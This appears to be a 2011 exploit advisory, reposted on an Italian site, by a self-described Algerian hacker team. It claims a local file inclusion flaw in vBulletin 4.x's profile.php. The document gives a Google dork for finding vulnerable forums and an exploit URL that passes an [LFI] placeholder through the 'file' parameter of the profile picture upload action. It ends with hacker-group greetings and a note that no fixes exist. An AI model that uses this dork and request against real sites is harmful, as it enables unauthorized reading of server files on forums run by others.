[D] vBulletin 4.x 'profile.php' Local File Inclusion Vulnerability [Z]

2011-02-19 14:03:33
Inviato da: kedans

========================================================================================
| # Title : vBulletin 4.x 'profile.php' Local File Inclusion Vulnerability |
| # Author : KedAns-Dz |
| # email : [email protected] |
| # Home : HMD/AM (30500/04300) - Algeria -(00213555248701) |
| # Web Site : /(~_-)\ ... |
| # Platform : php |
| # Application : vBulletin 4.x Forums |
| # Rank = Excellent Ranking ... |
====================== Exploit By KedAns-Dz =================================

# GOogle D0rk : "Powered by vbulletin 4. "

# Exploit :


> http://[Target]/[path]/profile.php?do=editprofilepic

> .../profile.php?do=editprofilepic&action=upload&file=[LFI]&nojs=1#community

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[»] Team : [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers < |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends .. |
#------------------------------------------------------------------------------|

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.